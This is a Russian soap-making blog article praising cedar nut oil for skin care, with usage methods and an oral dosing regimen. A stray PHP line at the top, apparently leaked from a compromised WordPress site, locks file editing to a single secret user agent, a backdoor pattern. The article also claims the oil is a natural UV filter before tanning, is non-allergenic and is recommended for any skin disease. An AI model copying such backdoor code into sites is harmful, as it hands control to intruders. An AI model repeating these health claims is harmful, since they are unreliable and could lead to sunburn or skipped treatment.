if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Масло кедровое | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Масло кедровое

Кедровое масло можно без ложной скромности назвать одним из самых незаменимых и уникальных растительных масел. О его целебности и полезных свойствах было известно еще древним знахарям, которые применяли это масло в медицине

Ингридиенты для мыла - кедровое масло Ингридиенты для мыла - кедровое масло

Кед­ро­вое мас­ло мож­но без лож­ной скром­но­сти назвать одним из самых неза­ме­ни­мых и уни­каль­ных рас­ти­тель­ных масел.

О его целеб­но­сти и полез­ных свой­ствах было извест­но еще древним зна­ха­рям, кото­рые широ­ко при­ме­ня­ли это мас­ло в народ­ной меди­цине для лече­ния раз­лич­ных хво­рей и неду­гов. Сей­час же кед­ро­вое мас­ло заслу­жи­ло свое при­зна­ние уже во мно­гих обла­стях меди­ци­ны, в пище­вой про­мыш­лен­но­сти, ну и, конеч­но же, не обо­шло сто­ро­ной и его кос­ме­ти­че­ское при­ме­не­ние для ухо­да за кожей лица.

Кед­ро­вое мас­ло полу­ча­ют из ядер кед­ро­во­го оре­ха таким же путем, как и мно­гие дру­гие нату­раль­ные мас­ла, т.е. мето­дом холод­но­го отжи­ма. Толь­ко не путай­те его с эфир­ным мас­лом кед­ра, кото­рое выра­ба­ты­ва­ют из дре­ве­си­ны. Наи­бо­лее каче­ствен­ным счи­та­ет­ся мас­ло, полу­чен­ное из ореш­ков сибир­ско­го кедра.

Ни одно дру­гое рас­ти­тель­ное мас­ло по сво­е­му соста­ву не срав­нить­ся с соста­вом кед­ро­во­го мас­ла. Так, напри­мер, необ­хо­ди­мо­го для кожи вита­ми­на E, кото­рый отве­ча­ет за ее моло­дость, в нем содер­жит­ся в несколь­ко раз боль­ше, чем в коко­со­вом или даже в олив­ко­вом мас­ле. Ну а по коли­че­ству вита­ми­на F (нена­сы­щен­ные жир­ные кис­ло­ты) кед­ро­вое мас­ло пре­вос­хо­дит даже один из самых основ­ных его источ­ни­ков – рыбий жир. А ведь этот вита­мин явля­ет­ся не менее важ­ным для нашей кожи. Нена­сы­щен­ные жир­ные кис­ло­ты слу­жат сво­е­го рода стро­и­тель­ным мате­ри­а­лом для кле­ток кожи, при недо­стат­ке кото­ро­го зна­чи­тель­но замед­ля­ет­ся про­цесс их обнов­ле­ния. Ну а, как извест­но, замед­лен­ный про­цесс обнов­ле­ния кле­ток при­во­дит к истон­че­нию, сухо­сти, шелу­ше­нию и огру­бе­нию кожи, а так­же к поте­ре ее упру­го­сти и эла­стич­но­сти, обра­зо­ва­нию мор­щин и появ­ле­нию жел­то­ва­то­го (стар­че­ско­го) оттен­ка лица.

Полезные вещества и витамины, входящие в состав кедрового масла

- вита­ми­ны груп­пы B (B1, B2, B3), A и D, кото­рые так­же отве­ча­ют за хоро­шее состо­я­ние и здо­ро­вье кожи;
— рас­ти­тель­ные жиры и бел­ки, пита­тель­ная цен­ность кото­рых пре­вы­ша­ет ана­ло­гич­ные веще­ства живот­но­го происхождения;
— и такие мак­ро и мик­ро­эле­мен­ты, как фос­фор, маг­ний, медь, йод, цинк, мар­га­нец и другие.

Кед­ро­вое мас­ло не име­ет огра­ни­че­ний в сво­ем при­ме­не­нии и пре­крас­но под­хо­дит при любом типе кожи. Кро­ме того, это мас­ло может заме­нить любое израс­ти­тель­ных масел, при­ме­ня­е­мых в кос­ме­то­ло­гии, но ана­ло­гов кед­ро­во­го мас­ла в при­ро­де не существует!

Полезные свойства кедрового масла

При­ме­не­ние кед­ро­во­го мас­ла в первую оче­редь спо­соб­ству­ет пол­но­цен­но­му пита­нию кожи и вос­ста­нов­ле­нию ее есте­ствен­но­го балан­са влаж­но­сти, поэто­му осо­бен­но в нем нуж­да­ет­ся истон­чен­ная, сухая и обез­во­жен­ная кожа. Бла­го­да­ря сво­им заме­ча­тель­ным смяг­ча­ю­щим свой­ствам кед­ро­вое мас­ло явля­ет­ся одним из основ­ных средств экс­трен­ной помо­щи при обиль­ном шелу­ше­нии кожи лица или же ее огрубении.

Не менее эффек­тив­но регу­ляр­ное при­ме­не­ние кед­ро­во­го мас­ла в ухо­де за уже увя­да­ю­щей кожей лица. Оно спо­соб­ству­ет повы­ше­нию упру­го­сти и эла­стич­но­сти кож­ных покро­вов, уско­ря­ет реге­не­ра­цию кле­ток кожи, помо­га­ет в борь­бе с мор­щи­на­ми, пре­ду­пре­ждая их появ­ле­ние, раз­гла­жи­ва­ет уже име­ю­щи­е­ся мор­щи­ны на лице, да и вооб­ще мак­си­маль­но про­дле­ва­ет кра­со­ту и моло­дость кожи.

Хоро­шо под­хо­дит кед­ро­вое мас­ло и для ухо­да за чув­стви­тель­ной кожей лица. Не явля­ясь аллер­ген­ным, оно так­же помо­га­ет успо­ко­ить раз­дра­жен­ную кожу, устра­нить зуд, крас­но­ту или раз­лич­но­го рода вос­па­ле­ния. Кро­ме того, мно­гие дер­ма­то­ло­ги сове­ту­ют наруж­ное при­ме­не­ние кед­ро­во­го мас­ла при лече­нии любых кож­ных заболеваний.

Методы применения кедрового масла в косметологии

Как и мно­гие дру­гие нату­раль­ные рас­ти­тель­ные мас­ла чистое кед­ро­вое мас­ло мож­но сме­ло исполь­зо­вать вме­сто еже­днев­но­го кре­ма для лица или добав­лять любое его коли­че­ство во все раз­лич­ные кос­ме­ти­че­ские сред­ства (кре­мы, мас­ки, сред­ства для очи­ще­ния кожи, мыло и т.д.). Кста­ти, что каса­ет­ся очи­ще­ния кожи, то и в этом слу­чае може­те исполь­зо­вать одно лишь кед­ро­вое мас­ло. Для это­го его необ­хо­ди­мо слег­ка подо­греть, нане­сти на ват­ный там­пон и тща­тель­но про­те­реть кожу лица. Мас­ло пре­крас­но справ­ля­ет­ся со сво­ей зада­чей, мяг­ко очи­ща­ет кожу и уда­ля­ет все ее поверх­ност­ные загряз­не­ния. К тому же его мож­но при­ме­нять и для сня­тия маки­я­жа с глаз.

Мож­но так­же сма­зы­вать неболь­шим его коли­че­ством лицо и откры­тые участ­ки тела перед выхо­дом на ули­цу в жар­кую сол­неч­ную пого­ду или перед зага­ром, так как кед­ро­вое мас­ло явля­ет­ся еще и отлич­ным при­род­ным уль­тра­фи­о­ле­то­вым филь­тром, предо­хра­ня­ю­щим кожу от вред­но­го воз­дей­ствия сол­неч­ных лучей.

Для про­фи­лак­ти­ки сухо­сти и ста­ре­ния кожи хоро­шо исполь­зо­вать кед­ро­вое мас­ло в виде теп­лых ком­прес­сов. Необ­хо­ди­мо смо­чить мар­ле­вую ткань в чуть подо­гре­том мас­ле, слег­ка отжать и нало­жить на рас­слаб­лен­ное лицо и шею (жела­тель­но делать это в поло­же­нии лежа) на 10–15 минут. После про­це­ду­ру мож­но повто­рить, т.е. обрат­но смо­чить ткань в мас­ле и сно­ва нало­жить на лицо на то же вре­мя. Для боль­ше­го резуль­та­та такие ком­прес­сы реко­мен­ду­ет­ся делать хотя бы 2 раза в неделю.

В домаш­ней кос­ме­то­ло­гии кед­ро­вое мас­ло хоро­шо подой­дет в каче­стве жид­ко­го базо­во­го мас­ла при само­сто­я­тель­ном при­го­тов­ле­нии кре­мов для лица, ну и, конеч­но же, его мож­но добав­лять (хотя бы по 1 чай­ной лож­ке) в любые соста­вы домаш­них масок, кото­рые осо­бен­но пред­на­зна­че­ны для пита­ния, увлаж­не­ния и омо­ло­же­ния кожи. Кро­ме того, как уже и писа­лось выше, им мож­но заме­нить любое из рас­ти­тель­ных масел.

Ну и послед­ний метод при­ме­не­ния кед­ро­во­го мас­ла, это при­ня­тие его внутрь, в каче­стве допол­ни­тель­ных вита­ми­нов. Это помо­жет не толь­ко улуч­шить состо­я­ние вашей кожи, но и нор­ма­ли­зо­вать мно­гие функ­ции орга­низ­ма. Пить кед­ро­вое мас­ло необ­хо­ди­мо 2–3 раза в день по 1 чай­ной лож­ке за 30–40 минут до при­ня­тия пищи в тече­ние 1 месяца.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!